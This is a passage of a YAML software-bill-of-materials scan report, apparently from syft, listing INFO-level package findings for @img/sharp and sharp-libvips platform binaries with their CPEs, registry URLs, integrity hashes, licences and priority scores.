|
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-darwin-arm64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz
|
|
integrity: sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d46a9ddb45c9c115
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-darwin-x64 0.34.5'
|
|
title: '@img/sharp-darwin-x64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-darwin-x64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0e26c2a4fd47f5b6
|
|
name: '@img/sharp-darwin-x64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-darwin-x64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz
|
|
integrity: sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f40ef319dfe0f7ca
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4'
|
|
title: '@img/sharp-libvips-darwin-arm64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c127f66367bb283f
|
|
name: '@img/sharp-libvips-darwin-arm64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz
|
|
integrity: sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f2d59ff4b7dad330
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4'
|
|
title: '@img/sharp-libvips-darwin-x64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9896d5c1cacbd583
|
|
name: '@img/sharp-libvips-darwin-x64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz
|
|
integrity: sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7b39904a53a17a82
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4'
|
|
title: '@img/sharp-libvips-linux-arm 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 35db8dcfe65acc63
|
|
name: '@img/sharp-libvips-linux-arm'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz
|
|
integrity: sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 24ce05de10ecc79e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4'
|
|
title: '@img/sharp-libvips-linux-arm64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b77c206e5d189694
|
|
name: '@img/sharp-libvips-linux-arm64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz
|
|
integrity: sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 042fdfd641843c8d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4'
|
|
title: '@img/sharp-libvips-linux-ppc64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0a49b35ad8071788
|
|
name: '@img/sharp-libvips-linux-ppc64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz
|
|
integrity: sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2eef65dffbde81a3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4'
|
|
title: '@img/sharp-libvips-linux-riscv64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 69aa9726ceb1125a
|
|
name: '@img/sharp-libvips-linux-riscv64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
